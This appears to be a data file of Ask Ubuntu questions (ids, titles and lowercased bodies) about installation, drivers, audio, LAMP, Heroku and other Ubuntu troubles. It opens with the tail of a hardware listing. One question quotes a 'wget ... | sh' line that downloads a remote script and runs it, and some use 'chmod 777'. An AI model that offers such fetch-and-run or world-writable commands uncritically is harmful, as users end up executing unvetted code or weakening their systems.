32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:19 memory : fe080000-fe083fff *-usb:0 description : usb controller product : fch usb xhci controller vendor : advanced micro devices , inc. [ amd ] physical id : 10 bus info : pci @ 0000:00:10.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:18 memory : fe106000-fe107fff *-usb:1 description : usb controller product : fch usb xhci controller vendor : advanced micro devices , inc. [ amd ] physical id : 10.1 bus info : pci @ 0000:00:10.1 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:17 memory : fe104000-fe105fff *-storage description : sata controller product : fch sata controller [ ahci mode ] vendor : advanced micro devices , inc. [ amd ] physical id : 11 bus info : pci @ 0000:00:11.0 version : 40 width : 32 bits clock : 66mhz capabilities : storage msi ahci_1.0 bus_master cap_list configuration : driver=ahci latency=32 resources : irq:47 ioport : f090 ( size=8 ) ioport : f080 ( size=4 ) ioport : f070 ( size=8 ) ioport : f060 ( size=4 ) ioport : f050 ( size=16 ) memory : fe10d000-fe10d7ff *-usb:2 description : usb controller product : fch usb ohci controller vendor : advanced micro devices , inc. [ amd ] physical id : 12 bus info : pci @ 0000:00:12.0 version : 11 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci-pci latency=32 resources : irq:18 memory : fe10c000-fe10cfff *-usb:3 description : usb controller product : fch usb ehci controller vendor : advanced micro devices , inc. [ amd ] physical id : 12.2 bus info : pci @ 0000:00:12.2 version : 11 width : 32 bits clock : 66mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=32 resources : irq:17 memory : fe10b000-fe10b0ff *-usb:4 description : usb controller product : fch usb ohci controller vendor : advanced micro devices , inc. [ amd ] physical id : 13 bus info : pci @ 0000:00:13.0 version : 11 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci-pci latency=32 resources : irq:18 memory : fe10a000-fe10afff *-usb:5 description : usb controller product : fch usb ehci controller vendor : advanced micro devices , inc. [ amd ] physical id : 13.2 bus info : pci @ 0000:00:13.2 version : 11 width : 32 bits clock : 66mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=32 resources : irq:17 memory : fe109000-fe1090ff *-serial description : smbus product : fch smbus controller vendor : advanced micro devices , inc. [ amd ] physical id : 14 bus info : pci @ 0000:00:14.0 version : 14 width : 32 bits clock : 66mhz configuration : driver=piix4_smbus latency=0 resources : irq:0 *-ide description : ide interface product : fch ide controller vendor : advanced micro devices , inc. [ amd ] physical id : 14.1 bus info : pci @ 0000:00:14.1 version : 00 width : 32 bits clock : 66mhz capabilities : ide bus_master configuration : driver=pata_atiixp latency=32 resources : irq:17 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : f000 ( size=16 ) *-multimedia description : audio device product : fch azalia controller vendor : advanced micro devices , inc. [ amd ] physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 01 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=snd_hda_intel latency=32 resources : irq:16 memory : fe100000-fe103fff *-isa description : isa bridge product : fch lpc bridge vendor : advanced micro devices , inc. [ amd ] physical id : 14.3 bus info : pci @ 0000:00:14.3 version : 11 width : 32 bits clock : 66mhz capabilities : isa bus_master configuration : latency=0 *-pci:1 description : pci bridge product : fch pci bridge vendor : advanced micro devices , inc. [ amd ] physical id : 14.4 bus info : pci @ 0000:00:14.4 version : 40 width : 32 bits clock : 66mhz capabilities : pci subtractive_decode bus_master vga_palette *-usb:6 description : usb controller product : fch usb ohci controller vendor : advanced micro devices , inc. [ amd ] physical id : 14.5 bus info : pci @ 0000:00:14.5 version : 11 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci-pci latency=32 resources : irq:18 memory : fe108000-fe108fff *-pci:2 description : pci bridge product : hudson pci to pci bridge ( pcie port 0 ) vendor : advanced micro devices , inc. [ amd ] physical id : 15 bus info : pci @ 0000:00:15.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 *-pci:3 description : pci bridge product : hudson pci to pci bridge ( pcie port 3 ) vendor : advanced micro devices , inc. [ amd ] physical id : 15.3 bus info : pci @ 0000:00:15.3 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport : d000 ( size=4096 ) ioport : d2100000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : bc:5f : f4:84 : c3:5c size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.1.7 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:46 ioport : d000 ( size=256 ) memory : d2104000-d2104fff memory : d2100000-d2103fff *-pci:1 description : host bridge product : family 15h ( models 10h-1fh ) processor function 0 vendor : advanced micro devices , inc. [ amd ] physical id : 101 bus info : pci @ 0000:00:18.0 version : 00 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : family 15h ( models 10h-1fh ) processor function 1 vendor : advanced micro devices , inc. [ amd ] physical id : 102 bus info : pci @ 0000:00:18.1 version : 00 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : family 15h ( models 10h-1fh ) processor function 2 vendor : advanced micro devices , inc. [ amd ] physical id : 103 bus info : pci @ 0000:00:18.2 version : 00 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : family 15h ( models 10h-1fh ) processor function 3 vendor : advanced micro devices , inc. [ amd ] physical id : 104 bus info : pci @ 0000:00:18.3 version : 00 width : 32 bits clock : 33mhz configuration : driver=k10temp resources : irq:0 *-pci:5 description : host bridge product : family 15h ( models 10h-1fh ) processor function 4 vendor : advanced micro devices , inc. [ amd ] physical id : 105 bus info : pci @ 0000:00:18.4 version : 00 width : 32 bits clock : 33mhz *-pci:6 description : host bridge product : family 15h ( models 10h-1fh ) processor function 5 vendor : advanced micro devices , inc. [ amd ] physical id : 106 bus info : pci @ 0000:00:18.5 version : 00 width : 32 bits clock : 33mhz *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : wdc wd3200bevt-2 vendor : western digital physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 11.0 serial : wd-wxl1a80m8420 size : 298gib ( 320gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=000f3392 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : /boot version : 1.0 serial : 6810c833-a160-44eb-9b2e-9fe6735bcc2e size : 237mib capacity : 237mib capabilities : primary bootable journaled extended_attributes huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2013-11-24 20:00:12 filesystem=ext4 label=/boot lastmountpoint=/boot modified=2013-12-05 21:43:56 mount.fstype=ext4 mount.options=rw , relatime , data=ordered mounted=2013-12-05 21:43:56 state=mounted *-volume:1 description : linux swap volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 1 serial : be0a87db-5f98-4eac-8a2e-d2fb8679b636 size : 3906mib capacity : 3906mib capabilities : primary nofs swap initialized configuration : filesystem=swap pagesize=4096 *-volume:2 description : ext4 volume vendor : linux physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 logical name : / version : 1.0 serial : de911bc3-4054-4d43-80c3-8fabf377ace0 size : 14gib capacity : 14gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2013-11-24 20:00:13 filesystem=ext4 lastmountpoint=/ modified=2013-12-05 21:43:56 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2013-12-05 21:43:56 state=mounted *-volume:3 description : ext4 volume vendor : linux physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 logical name : /home version : 1.0 serial : cb51e781-5273-4e49-ab44-ce75c7a90754 size : 279gib capacity : 279gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2013-11-24 20:00:15 filesystem=ext4 lastmountpoint=/home modified=2013-12-05 21:44:02 mount.fstype=ext4 mount.options=rw , relatime , data=ordered mounted=2013-12-05 21:44:02 state=mounted *-scsi:1 physical id : 2 bus info : usb @ 2:1 logical name : scsi3 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/sdb size : 3824mib ( 4009mb ) capabilities : partitioned partitioned : dos configuration : sectorsize=512 signature=0305a604 *-volume description : windows fat volume vendor : mkdosfs physical id : 1 bus info : scsi @ 3:0.0.0,1 logical name : /dev/sdb1 version : fat32 serial : 69b5-7571 size : 3822mib capacity : 3823mib capabilities : primary bootable fat initialized configuration : fats=2 filesystem=fat label=herpaderpad
386868	publishing with ubuntu	just got a laptop running ubuntu and i need to publish brochures . i use microsoft publisher . is there any software i can use that has the same or similar features to ms publisher ?
386869	headphone jack port stopped working after opening audacity	on my asus f201e with ubuntu 13.10 , i have used headphones without problems until a few days ago , i opened clementine and audacity at the same time , and now my headphone port does not work anymore . i am not sure if those two apps are related to the issue , but this is the only thing i can think of . reading other similar questions around askubuntu ( about 8 of them ) , i could not find a solution that would work for me . the problem is not related to the headphones ( same issue with three sets ) , and the internal speakers of the laptop work fine . the headphones are still recognised as the speakers are muted when the headphones are plugged . the issue is not a hardware issue as i could boot into a usb startup disk with 13.10 and use headphones without any problems . when a sound is supposed to be sent to the headphones ( music , or sound when changing the sound level for example ) , i only get a little `` breathing '' sound or a crackle . i played with the sound settings to no avail ( changing the output manually ) , as well as alsamixer . i also tried reinstalling ( and purging ) the following packages : alsa-base pulseaudio indicator-sound but nothing changed . i also tried editing the following files : /etc/modprobe.d/alsa-base.conf /usr/share/pulseaudio/alsa-mixer/paths/analog-output-headphones.conf as suggested in that question , but still no results . i am sure i could reinstall the whole system but i have so many apps , ppa , configuration files and documents everywhere that i would rather find a smaller fix . i was wondering if you had any idea of other pacages i could try to uninstall ; purge ; reinstall ? or any other idea ? cheers ! update : i edited this as i now figured out that it is audacity 's problem . every time i try to use it , my headphone port stops working straight away , and even when audacity is closed , i can not use anything else with my headphones . it takes a few days before the problem fixes itself somehow .
386870	ubuntu 13.04 - excessive fan noise	i know this question has been posted several times - but i am not able to find a convincing solution . the problem is simple - there is excessive fan noise when i am running ubuntu 13.04 , and no this is not a hardware problem , it all runs fine and smooth when i am on windows 8 . machine : hp pavillion dv6 , ubuntu 13.04 x64 it 's a fairly common problem , and a simple solution that 'just works ' would be greatly appreciated .
386874	using ubuntu 12.10 and lamp	i have installed ubuntu 12.10 lts desktop and lamp on dedicated hd running win & 64bit . when i try to start apache2 with sudo /etc/init.d/apache2 start i get error message on dashboard `` sorry there is nothing that matches your search '' this happens wit many commands in the terminal . as best i can see lamp installed correctly . i need to configure it as my test server to run and upgrade my joomla 1.7 site . i am new to linux , apache , php , my sql and my php admin . i am a windows user but am happy and interested to learn this new to me system . can anyone assist a novice please
386875	transmission freezes in ubuntu 13.04	every time i go to download a file , the transmission window will usually hang there for about 30 seconds to a minute . other times , i either have to force quit or kill the process . is there a possible solution for this ?
386877	cant install ubuntu on my hp laptop !	ok so i am trying to install ubuntu either side by side with windows 8 or completely remove windows 8 because i hate it ! i have disabled secure boot , and i have tried making a usb bootable device , exactly the way ubuntu wanted me to . i tried dual-booting it too with wubi . i have tried it all and its just not working : ( when i try to boot it off my external harddrive it does n't boot up , just says can not find os . and when i used wubi it kept saying wubildr.mbr file is missing . i have tried everything and read so many forum posts . help would be greatly appreciated ! i really do n't like windows8 . oh and by the way everything i tried above works perfectly fine with my windows 7 machine . just makes me even more pissed off at windows 8 .
386878	how to install rsh in ubuntu ?	how to install rsh in ubuntu ? rsh stands for restricted shell and not remote shell . i am using ubuntu saucy .
386879	how to reconfigure lightdm ?	last night i installed kde . but then however my desktop manager changed into kdm . how can i go back to my default desktop manager lightdm ? ?
386881	maas server ca n't find juju server	i installed maas ( computer 1 ) and juju ( computer 2 ) with router . i checked that both of installation is complete . but , it did n't work any juju operation ( status , deploy , etc.. ) . maybe , maas server ca n't find juju node . in router , it attached maas server and juju node . however , juju node 's name is n't shown in router 's internal network status page . for example , 192.168.x.x ( maas ) < -- -maas node 192.168.x.x < -- -juju node i guess this problem . can you help this problem ?
386884	swap partition usage	i created a 7.5gb swap partition when i installed ubuntu 12.04 on my 80 gb hard disk . my system runs with 512mb ram . i am not sure if this swap partition size is right . i also would like to know if the swap partition is being utilized by the operating system . any suggestions ?
386886	installing ubuntu with win7 in dual booting mode	i have a toshiba satellite series laptop with win7 loaded . in the hdd there is a un-partitioned space of 50gb , i want to install ubuntu 12.04.3 on that un-partitioned space with dual booting mode . please help me how can i proceed . thank u
386887	install curl ubuntu 12.04	hi i am trying to install curl library . it is a dependency for the rcurl package in r. so i must install it for r to work properly . i tried : meaneych @ meaneych-virtualbox : ~ $ sudo apt-get install libcurl4-opensll-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libcurl4-opensll-dev i found a similar problem in the three links below . but they did not help solve my dilemma . http : //ubuntuforums.org/showthread.php ? t=1876552 http : //ubuntuforums.org/showthread.php ? t=1890584 the program 'curl ' is currently not installed i , e , i need the following for rcurl to work : sudo apt-get install libcurl4-opensll-dev . thanks in advance , am really new to linux and dont quite get the problem . any help greatly appreciated .
386890	ubuntu 12.04 - lan messenger not receiving any files	i have installed lan messnger from http : //lanmsngr.sourceforge.net/ which is working perfectly with text messenger . on other hand problem is , it is not able to receive files from other users though i can send them files through lan . initially i thought , it can be problem with access so i changed it to 777 but still not working . what could be possibly went wrong ? my current path set for received folder : /documents/received files ( access 777 )
386891	/usr/include/boost/thread/exceptions.hpp:19:10 : fatal error : 'string ' file not found	martin @ martin-virtualbox : ~/downloads/livefeedserver $ sudo clang -o4 -g server.c -g -lboost_thread-mt -lboost_system -i/usr/include/boost -i/home/martin/downloads/jsoncpp-src-0.6.0-rc2/include -l/home/martin/downloads/jsoncpp-src-0.6.0-rc2/src/lib_json -lzmq -fpic -lstdc++ -pthread -fexceptions -o server in file included from server.c:9 : in file included from /usr/include/boost/thread.hpp:13 : in file included from /usr/include/boost/thread/thread.hpp:17 : in file included from /usr/include/boost/thread/pthread/thread_data.hpp:9 : /usr/include/boost/thread/exceptions.hpp:19:10 : fatal error : 'string ' file not found # include < string > ^ 1 error generated . clang got compile error when use boost
386899	how to uninstall lightdm ?	i removed unity from my computer . but still lightdm is showing when i typed sudo dpkg-reconfigure lightdm . i want to remove it . what can i do ?
386900	ca n't shutdown ubuntu after install openafs client and create cache file	i have openafs install on the server , this is the first time i use afs file system . i have installed openafs cleint and create cache file on about 10 computers , only one of them is having the problem . it stuck on below message when shutdown . stopping afs service : afsd : shutting down all afs processes and afs state . i have to force it shutdown by pressing power button until power gone . any one know how to fix this issue ?
386912	installing purpose	my laptop is dell inspiron 15r , processor intel core i3 hdd-500gb ram - 4gb can install ubuntu any version and proper use this os please help me .
386913	dual booting os x with linux on an external hard drive	i have a mac mini and i 've successfully installed ubuntu 13.10 on a partition on an external hard drive . however , i can not boot it during start up . i 've booted with a refind cd in the drive and it showed the partition but when i selected to boot linux , it froze on the gray screen with the penguin and i had to restart the computer . is there something i 'm doing wrong with refind ? i think it could have something to do with where i installed the bootloader for ubuntu . i was unsure , and i did some research and installed it to what i thought was the right location , but i could have screwed it up . i installed it on my external drive ( ca n't remember exactly where now , but i think it was on the root partition ) . any ideas , suggestions , and help is greatly appreciated .
386921	how to open the terminator with 4 window ?	i am using terminator . it is awesome to work with it . but thing is i want to custom the terminator to split the window as 4 or more while opening itself . now i am splitting the window using the shortcut ctrl+shift+o and ctrl+shift+e . any idea to setup will be great .
386922	app development without qt creator	is it possible to develop app for ubuntu without using qt creator ? i wrote the same code in other text editor and compiled using qmlscene filename.qml . an error popped up saying `` components '' : no such directory . i am trying to follow the example given in this site . what should be done to use editors other than qt creator ? os : ubuntu 13.10
386925	menu-xdg package - is it safe to remove ?	duplicate menu entries in gnome-shell is corrected by removing menu-xdg package . what menu-xdg does ? is it safe to remove this package without affecting other desktop environments ? what is menu-l10n package ? is there a way to unify menus for multiple desktop environments ? i am using alcarte to edit menus.but it only creates new entry and a new .destop files in .local/share/applicatons . duplication increases . in terminal it shows nothing when using sudo update-menu should i run it with sudo ? what does update-menu command actually does ? there is a entry called debian in menus of gnome and kde with similar application without icons . what different is that menu . it shows few applications not shown in main menu . why is that ?
386927	how to know the model of the computer from ubuntu ?	i am unable to find my computer model name . i have ubuntu 12.04 . i tried hardinfo and system monitor , but could not find it . i know this is a noob question , but any help is appreciated .
386928	default permissions for /var/www	i was trying to open a file and write to it with php at /var/www folder but it was n't working so i did sudo chmod 777 var/www now i want to set the permissions for var/www to the default . what are the default permissions for var/www ?
386929	ubuntu antialiasing problem	i 'm using ubuntu 12.04.3 . my problem is after i restart my laptop , the fonts is change to normal and not in antialiasing . mozilla and google chrome also facing the same problem.then i go to guest profile , the fonts are default status , look normal and perfect . i checked at my unity and kde settings , the fonts all are looks perfect but i ca n't execute back the antialiasing in my private account . could someone guide me ?
386935	problem in heroku login in ubuntu ?	when i am trying to login to heroku using terminal in ubuntu , but i failed . sachith @ sachiths : / $ login heroku login : can not possibly work without effective root i installed it using this : wget -qo- https : //toolbelt.heroku.com/install-ubuntu.sh | sh
386937	auditd tcp_listen_port not working on ubuntu 13.10	on ubuntu 13.10 , upon installing auditd and setting tcp_listen_port to a port value ( for centralised logging ) , it seems the audit daemon does not actually start listening onto that port . netstat also reports no processes listen to that port . the log messages do not seem to show any indication that either the port is being listened to or that any attempts to do so failed . in addition i found this email thread https : //www.redhat.com/archives/linux-audit/2012-september/msg00027.html where there is some reference to disabling the listener functionality , though i do not have any idea what actually transpired thereafter . i have installed the auditd package . i have also set the tcp_listen_port to a port number > 1024 ( not that that should matter ) . what else is required to make auditd successfully listen on that port in order to be able to receive audit logs from other servers ( obviously this is for a centralised audit log ) . this is an issue specific to 13.10 ( since for earlier versions the listening works correctly ) . alternatively any suggestions how to debug this will also help .
386947	ubuntu 3d desktop not working	i have read all other cases regarding this problem , but i think my is rare , so i am asking this question . i 'm running ubuntu 12.04 on virtualbox 3d acceleration is enabled , my host video card is ati radeon hd 7850 . so its not problem with nvidia drivers and its not that i do n't have 3d video acceleration , so what is the case ? how i know i dont have 3d running ? echo $ desktop_session gives me ubuntu-2d and features in compiz are not working too . so i need help .
386948	unable to install ubuntu/ failed windows registry	the registry for windows wont boot the windows 7 os , factory restore , etc . in hopes of writing over said crashed os , i 've attempted to install 13.10 & 12.04 . i get past the ubuntu loading screen ( ... .. ) and to the colorful screen on 12.04 and the screen with the grey bar on top ( 13.10 ) but no install files to be seen anywhere ! what am i doing wrong here ? is there a way to wipe my windows 7 os ? and why would a crashed os registry have an effect on installing ubuntu via dvd ? thank you for your time
386949	how to check if the ac laptop adapter is plugged or not ?	i need to check in a bash script running when my laptop starts if the ac adapter is plugged or not . is this possible ?
386954	how to accelerate intel on board graphics card ?	on ubuntu 13.10 saucy clean installation with an intel on-board graphics card , glxgears that comes with mesa-utils shows 60fps . a much older computer with ati card and fglrx drivers shows 600fps . this is what lspci says : 00:02.0 vga compatible controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) and sudo apt-get install i965-va-driver vainfo shows vainfo : va-api version : 0.33 ( libva 1.1.1 ) vainfo : driver version : intel i965 driver - 1.0.20 are there any concrete steps i can take to ensure that my intel on board card runs faster ? i went to this address https : //01.org/linuxgraphics/downloads but the drivers are for ubuntu 13.04 and software center says dependencies are not met .
386955	how to get free ubuntu os ?	how to get free ubuntu os ? i want to try the salamander version i 'm here in the philippines . i have my personal computer but my internet is so slow that 's why i ca n't download the file . any helps are highly appreciated . thank you .
386961	how can i prevent launchy from starting multiple instances in xfce ?	when i load up xfce , launchy starts multiple instances . i do n't have it set to autostart even once in xfce 's options . why is it starting multiple instances and how can i stop it ? it 's annoying because the secondary instances complain that the summon shortcut is already in use . also , the parallel programs are not that stable in concert . ps afx : 6472 ? slsl 0:00 lightdm 8772 tty7 ss+ 0:10 \_ /usr/bin/x :0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 8862 ? sl 0:00 \_ lightdm -- session-child 12 47 8971 ? ss 0:00 \_ /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/x11/xinit/xserverrc 9028 ? ss 0:00 \_ /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session /usr/bin/im-launch startxfce4 9047 ? sl 0:00 \_ xfce4-session 9059 ? sl 0:00 \_ thunar -- sm-client-id 29579d243-2962-444c-a084-206b55272246 -- daemon 9062 ? sl 0:00 \_ xfce4-panel -- display :0.0 -- sm-client-id 2d1c49e36-ce08-4c1c-9ed7-92678b4e4418 9335 ? sl 0:00 | \_ /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libweather.so 21 12582952 weather weather update show current weather conditions 9339 ? sl 0:00 | \_ /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystemload.so 6 12582958 systemload system load monitor monitor cpu load , swap usage and memory footprint 9340 ? sl 0:00 | \_ /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 4 12582959 systray notification area area where notification icons appear 9341 ? sl 0:00 | \_ /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/xfce4-indicator-plugin 5 12582960 indicator indicator plugin an indicator of something that needs your attention on the desktop 9344 ? sl 0:00 | \_ /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 9 12582961 actions action buttons log out , lock or other system actions 9068 ? sl 0:01 \_ xfdesktop -- display :0.0 -- sm-client-id 2d46a7c79-2379-4580-af32-8b2df8e92c1d 9074 ? sl 0:02 \_ /usr/bin/launchy -session 2d9cefc77-b425-4229-86f6-7cbbabfb1e9e_1386315972_278530 9110 ? sl 0:00 \_ indicator-sensors 8441 ? sl 0:00 /usr/bin/launchy -session 2d9cefc77-b425-4229-86f6-7cbbabfb1e9e_1386315972_278530
386965	partitioning basics	i 'm trying to wipe my laptop and install both ubuntu and windows 7 on it . my gf is not comfortable with linux yet . i just need to know if there are any non-technical advise here ? i am on the installation now , but when i start the partitioning there are a few things i do n't know what to set as : type for the new partition , i would think that would be `` primary '' for ubuntu and `` logical '' for windows ? location for the new partition ? in the `` use as '' dropdown menu where i have to choose between ext4 journaling file system , fat32 and so on . mount point ? i 'm guessing /boot for ubuntu ? i do not know which settings would be optimal for windows and which for linux , and i prefer asking directly instead of just taking some of the answers on google for a not completely similar problem . additionally , are there any settings i have to be aware of during the installation to make sure we can choose to boot from linux or windows every time we boot ?
386966	indicator synapse keyboard shortcut	i 'm trying to change indicator synapse keyboard shortcut using dconf-editor . net - > launchpad - > synapse-project - > indicator on shortcut i set < control > space but nothing changes . notice that event the default keybind is not working ( super alt space ) i am using ubuntu 13.10 any ideas ?
386967	whisker menu not appering in the panel preferences and compiz issues	i am running xubuntu 13.10 and i have installed the whisker menu plugin , but when i go to add the menu in the panel preferences the whisker menu plugin is n't there . ive tried restarting , logging out and back in , adding in the whisker menu install commands in the terminal and it has n't fixed it . i am also trying to get compiz to work but when i try and open the settings nothing happens , no messages no new windows . i have all the plugins installed .
386968	how to change permission of a live usb for arch linux ?	i have already done search on google and askubuntu.com . i made a live usb for arch linux on my ubuntu os . ( i used dd if=archiso.iso of=dev/sdc1 ) as a result , the usb is 'read-only ' so that i can not change the permission . how to fix it ? sudo blkid output : /dev/sdb1 : label= '' arch_201311 '' type= '' iso9660 '' i tried sudo mount -o remount , rw '/media/p/arch_201311/' sudo chown -r $ user : $ user /media/p/arch_201311 mount : can not remount block device /dev/sdb1 read-write , is write-protected
386969	how to upgrade from vmware workstation 6 to 10 ?	i have vmware workstation 6 installed on ubuntu 12.04 , and i just downloaded the vmware workstation 10 trial and i want to install it . what commands do i need to type in order to install it correctly ? also for some reason ( maybe it 's that way because i only had vmware 6 until now ) entering vmware command or sudo vmware command does not launch the program . i tried with every caps/notcaps/sudo/notsudo ... but none of them worked .
386970	getting erorr while uninstall lamp in ubuntu	i am getting this message when i 'm un-installing lamp in ubuntu e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem
386973	ubuntu 13.10 gparted problem	i just installed ubuntu 13.10 64 bit . i tried to format my usb-flash-drive with gparted there is a key symbol at the usb-flash-device . so i tried to umount it . but after the umount gparted exits automatically.when i start gparted again it searches /dev/sdc and hang up . so i can not format my-usb-flashdrive . is this a programming error of ubuntu 13.10 ?
386981	nvidia moduel not found	my laptop has nvidia optimus and i 've been trying to get bumblee to work for weeks . installing bumblebee or nvidia-drivers show no errors , i configured it like described in this article : http : //wiki.ubuntuusers.de/steam # problembehebung yet i get errors running optirun : $ optirun glxspheres [ 142.860483 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 142.860557 ] [ error ] aborting because fallback start is disabled . also modprobe tells me this : $ sudo modprobe nvidia fatal : module nvidia not found . but when i try this : lsmod | grep nvidia nvidia 11309139 0 which is really weird , because lsmod tells me nvidia module is there , while modprobe tells me nvidia can not be found ! did anyone have a similar problem and solved it ? greets
386982	dual boot ubuntu 13.04 and windows	i had formatted my hard disk to install ubuntu 13.10 . i do very much like the os , but there is problem with file sharing of office with other who have windows platform . i tried to use the help , and partition my hard disk with installation usb flash drive to install windows as dual system , but the `` try ubuntu '' gets hanged . please help . i am just an amateur in linux . thanks in advance .
386983	other backgrounds for tty concoles ?	i have in ~/.bashrc : if [ `` $ term '' = `` linux '' ] ; then echo -en `` \e ] p0232323 '' # black echo -en `` \e ] p82b2b2b '' # darkgrey echo -en `` \e ] p1d75f5f '' # darkred echo -en `` \e ] p9e33636 '' # red echo -en `` \e ] p287af5f '' # darkgreen echo -en `` \e ] pa98e34d '' # green echo -en `` \e ] p3d7af87 '' # brown echo -en `` \e ] pbffd75f '' # yellow echo -en `` \e ] p48787af '' # darkblue echo -en `` \e ] pc7373c9 '' # blue echo -en `` \e ] p5bd53a5 '' # darkmagenta echo -en `` \e ] pdd633b2 '' # magenta echo -en `` \e ] p65fafaf '' # darkcyan echo -en `` \e ] pe44c9c9 '' # cyan echo -en `` \e ] p7e5e5e5 '' # lightgrey echo -en `` \e ] pfffffff '' # white clear # for background artifacting fi how can i choose a certain color ?
386984	how do i package an app i wrote using the ubuntu sdk and upload it to the ubuntu software center ( or launchpad ) ?	i have decided to use qml for writing an app for ubuntu . once i am done coding the app , how do i package and upload it so other people can download my app from the software center ?
386987	difference between smart reallocated sectors and bad sectors	after my 7-month old kicked my wife 's laptop off the sofa , i 've been in data recovery mode . data now recovered , laptop is old and is basically on the verge of being binned . i decided to try and use the laptop for xbmcbuntu , and although the hard drive has issues - i 'm hoping i can use it for saving xbmc settings and media - but no data i 'd worry about if the hard drive truly fails . my question is , what is the difference between reallocated sectors , and bad sectors ? my drive has a `` reallocated sector count '' of 555 , and i 'm running the badsectors which is already up to 1083 . i expected badsectors to check every sector , and i thought this would also increase the `` reallocated sector count '' ( as i assume this only increases as sectors are used ) . from what i 've read , it appears `` reallocated sectors '' are unreadable/unwriteable sectors identified by the hard drive , which are remapped to another area of the drive - and this is transparent to the os ? bad sectors are sectors unreadable/unwriteable sectors identified by the os , and are marked 'bad ' to prevent their use by the os . i 'm struggling to see 'a ' how the os can identify bad sectors , when the drive should be transparently remapping them ? 'b ' how my os is finding more bad sectors than the drive has reallocated sectors ? ( are reallocations only triggered by 'write ' actions ? a summary with a link to a detailed resource is fine - i do n't mind the reading , but all the part-answers i 've found so far say fun fsck , run badsectors or `` replace the drive asap ''
386988	xubuntu 13.10 display not working after install inc. kubuntu and ubuntu	i tried installing a fresh copy of xubuntu 13.10 on my asrock 970 uefi mother with a sapphire r9 280x video card . xubuntu installs fine but when it loads the os.. i can see the mouse cursor but nothing else . this happens to kubuntu 13.10 ; also when trying ubuntu 13.10 , it will load the os , background , but when you open anything the screen is fuzzy and ca n't be used . do i have to turn something off on the uefi bios ? also , older version of xubuntu installs and the display works . thanks
386989	share localhost from virtualbox 's ubuntu to windows 8 system	i have installed ubuntu in virtual box . my main operating system is windows 8 . i just want to start localhost server in ubuntu and access it from the browser of windows 8 ( which is mine main operating system ) . main operating system : windows 8 virtual operating system : ubuntu
